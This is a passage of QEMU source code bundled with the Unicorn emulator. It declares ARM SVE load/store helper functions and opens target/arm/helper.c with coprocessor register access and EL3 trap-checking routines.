tl, i32) DEF_HELPER_FLAGS_4(sve_ldff1sds_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldff1ss_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldff1sdu_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldff1sds_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldff1dd_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldff1dd_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldnf1bb_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldnf1bhu_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldnf1bsu_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldnf1bdu_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldnf1bhs_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldnf1bss_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldnf1bds_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldnf1hh_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldnf1hsu_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldnf1hdu_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldnf1hss_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldnf1hds_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldnf1hh_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldnf1hsu_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldnf1hdu_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldnf1hss_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldnf1hds_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldnf1ss_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldnf1sdu_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldnf1sds_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldnf1ss_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldnf1sdu_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldnf1sds_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldnf1dd_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldnf1dd_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_st1bb_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_st2bb_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_st3bb_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_st4bb_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_st1hh_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_st2hh_le_r, 
TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_st3hh_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_st4hh_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_st1hh_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_st2hh_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_st3hh_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_st4hh_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_st1ss_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_st2ss_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_st3ss_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_st4ss_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_st1ss_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_st2ss_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_st3ss_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_st4ss_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_st1dd_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_st2dd_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_st3dd_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_st4dd_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_st1dd_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_st2dd_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_st3dd_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_st4dd_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_st1bh_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_st1bs_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_st1bd_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_st1hs_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_st1hd_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_st1hs_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_st1hd_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_st1sd_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_st1sd_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldbsu_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldhsu_le_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldhsu_be_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldss_le_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldss_be_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldbss_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldhss_le_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldhss_be_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldbsu_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldhsu_le_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldhsu_be_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldss_le_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldss_be_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldbss_zss, 
TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldhss_le_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldhss_be_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldbdu_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldhdu_le_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldhdu_be_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldsdu_le_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldsdu_be_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_lddd_le_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_lddd_be_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldbds_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldhds_le_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldhds_be_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldsds_le_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldsds_be_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldbdu_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldhdu_le_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldhdu_be_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldsdu_le_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldsdu_be_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_lddd_le_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_lddd_be_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldbds_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldhds_le_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldhds_be_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldsds_le_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldsds_be_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldbdu_zd, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldhdu_le_zd, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldhdu_be_zd, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldsdu_le_zd, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldsdu_be_zd, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_lddd_le_zd, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_lddd_be_zd, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldbds_zd, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldhds_le_zd, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldhds_be_zd, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldsds_le_zd, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldsds_be_zd, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffbsu_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffhsu_le_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) 
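/*
 * Reader's note (added annotation) on the gather loads around this
 * point and the scatter stores further below: the final suffix names
 * the offset-vector form, _zsu and _zss being vectors of 32-bit
 * unsigned and signed offsets (widened before the address add) and
 * _zd vectors of 64-bit offsets. Relative to the contiguous forms
 * they carry one extra ptr, giving a signature of
 * (env, destination vector, predicate, offset vector, scalar base,
 * descriptor).
 */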
DEF_HELPER_FLAGS_6(sve_ldffhsu_be_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffss_le_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffss_be_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffbss_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffhss_le_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffhss_be_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffbsu_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffhsu_le_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffhsu_be_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffss_le_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffss_be_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffbss_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffhss_le_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffhss_be_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffbdu_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffhdu_le_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffhdu_be_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffsdu_le_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffsdu_be_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffdd_le_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffdd_be_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffbds_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffhds_le_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffhds_be_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffsds_le_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffsds_be_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffbdu_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffhdu_le_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffhdu_be_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffsdu_le_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffsdu_be_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffdd_le_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffdd_be_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffbds_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffhds_le_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffhds_be_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffsds_le_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffsds_be_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffbdu_zd, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffhdu_le_zd, TCG_CALL_NO_WG, void, env, ptr, ptr, 
ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffhdu_be_zd, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffsdu_le_zd, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffsdu_be_zd, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffdd_le_zd, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffdd_be_zd, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffbds_zd, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffhds_le_zd, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffhds_be_zd, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffsds_le_zd, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffsds_be_zd, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_stbs_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_sths_le_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_sths_be_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_stss_le_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_stss_be_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_stbs_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_sths_le_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_sths_be_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_stss_le_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_stss_be_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_stbd_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_sthd_le_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_sthd_be_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_stsd_le_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_stsd_be_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_stdd_le_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_stdd_be_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_stbd_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_sthd_le_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_sthd_be_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_stsd_le_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_stsd_be_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_stdd_le_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_stdd_be_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_stbd_zd, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_sthd_le_zd, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_sthd_be_zd, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_stsd_le_zd, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_stsd_be_zd, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_stdd_le_zd, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_stdd_be_zd, TCG_CALL_NO_WG, void, env, ptr, 
ptr, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve2_pmull_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32)
unicorn-2.1.1/qemu/target/arm/helper.c
/* * ARM generic helpers. * * This code is licensed under the GNU GPL v2 or later. * * SPDX-License-Identifier: GPL-2.0-or-later */ #include "qemu/osdep.h" #include "qemu/units.h" #include "cpu.h" #include "internals.h" #include "exec/helper-proto.h" #include "qemu/host-utils.h" #include "qemu/bitops.h" #include "qemu/crc32c.h" #include "exec/exec-all.h" #include "sysemu/cpus.h" #include "sysemu/tcg.h" #include "qemu/range.h" #include "qemu/guest-random.h" #include "arm_ldst.h" #include "exec/cpu_ldst.h" #include "kvm-consts.h" #ifdef TARGET_AARCH64 #include <qemu/guest-random.h> #endif #define ARM_CPU_FREQ 1000000000 /* FIXME: 1 GHz, should be configurable */ static bool get_phys_addr_lpae(CPUARMState *env, target_ulong address, MMUAccessType access_type, ARMMMUIdx mmu_idx, hwaddr *phys_ptr, MemTxAttrs *txattrs, int *prot, target_ulong *page_size_ptr, ARMMMUFaultInfo *fi, ARMCacheAttrs *cacheattrs); static void switch_mode(CPUARMState *env, int mode); static uint64_t raw_read(CPUARMState *env, const ARMCPRegInfo *ri) { assert(ri->fieldoffset); if (cpreg_field_is_64bit(ri)) { return CPREG_FIELD64(env, ri); } else { return CPREG_FIELD32(env, ri); } } static void raw_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { assert(ri->fieldoffset); if (cpreg_field_is_64bit(ri)) { CPREG_FIELD64(env, ri) = value; } else { CPREG_FIELD32(env, ri) = value; } } static void *raw_ptr(CPUARMState *env, const ARMCPRegInfo *ri) { return (char *)env + ri->fieldoffset; } uint64_t read_raw_cp_reg(CPUARMState *env, const ARMCPRegInfo *ri) { /* Raw read of a coprocessor register (as needed for migration, etc). */ if (ri->type & ARM_CP_CONST) { return ri->resetvalue; } else if (ri->raw_readfn) { return ri->raw_readfn(env, ri); } else if (ri->readfn) { return ri->readfn(env, ri); } else { return raw_read(env, ri); } } /* * Some registers are not accessible if EL3.NS=0 and EL3 is using AArch32 but * they are accessible when EL3 is using AArch64 regardless of EL3.NS. * * access_el3_aa32ns: Used to check AArch32 register views. * access_el3_aa32ns_aa64any: Used to check both AArch32/64 register views. */ static CPAccessResult access_el3_aa32ns(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { bool secure = arm_is_secure_below_el3(env); assert(!arm_el_is_aa64(env, 3)); if (secure) { return CP_ACCESS_TRAP_UNCATEGORIZED; } return CP_ACCESS_OK; } static CPAccessResult access_el3_aa32ns_aa64any(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { if (!arm_el_is_aa64(env, 3)) { return access_el3_aa32ns(env, ri, isread); } return CP_ACCESS_OK; } /* Some secure-only AArch32 registers trap to EL3 if used from * Secure EL1 (but are just ordinary UNDEF in other non-EL3 contexts). 
* Note that an access from Secure EL1 can only happen if EL3 is AArch64. * We assume that the .access field is set to PL1_RW. */ static CPAccessResult access_trap_aa32s_el1(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { if (arm_current_el(env) == 3) { return CP_ACCESS_OK; } if (arm_is_secure_below_el3(env)) { return CP_ACCESS_TRAP_EL3; } /* This will be EL1 NS and EL2 NS, which just UNDEF */ return CP_ACCESS_TRAP_UNCATEGORIZED; } /* Check for traps to "powerdown debug" registers, which are controlled * by MDCR.TDOSA */ static CPAccessResult access_tdosa(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { int el = arm_current_el(env); bool mdcr_el2_tdosa = (env->cp15.mdcr_el2 & MDCR_TDOSA) || (env->cp15.mdcr_el2 & MDCR_TDE) || (arm_hcr_el2_eff(env) & HCR_TGE); if (el < 2 && mdcr_el2_tdosa && 